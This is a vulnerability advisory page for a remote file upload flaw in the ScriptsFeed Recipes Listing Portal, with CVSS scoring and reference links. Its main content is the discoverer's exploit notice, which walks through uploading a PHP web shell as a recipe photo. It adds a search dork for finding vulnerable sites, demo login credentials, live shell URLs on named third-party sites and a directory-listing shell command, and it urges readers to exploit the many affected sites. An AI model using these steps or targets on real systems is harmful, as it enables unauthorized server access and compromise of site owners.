ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability

2009.08.14
Credit: ZoRLu
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 13.11.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] my bug number now: 39 [~] [~] my target bug number: 100 [~] [~] dork: allinurl:"recipedetail.php?id=" ( Ãok site var sömürün : ) ) [~] [~] ----------------------------------------------------------- Exploit: http://localhost/script/pictures/[id]your_shell.php you register to site register: http://localhost/script/register.php after you login to site login: http://localhost/script/login.php more after you click to "Add a Recipe" and add recipe and after click to "View your Recipes" click to you recipe open new page right click to your photo. select properties copy photo lick and paste your explorer go your shell your_shell.php path: http://localhost/script/pictures/[id]your_shell.php rfu for demo: user: zorlu passwd: zorlu1 shell path: http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php example 2: user: zorlu passwd: zorlu1 shell: http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI ) misal: http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler ) [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------

References:

http://xforce.iss.net/xforce/xfdb/46607
http://www.securityfocus.com/bid/32293
http://www.milw0rm.com/exploits/7112
http://secunia.com/advisories/32690
http://osvdb.org/49960


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top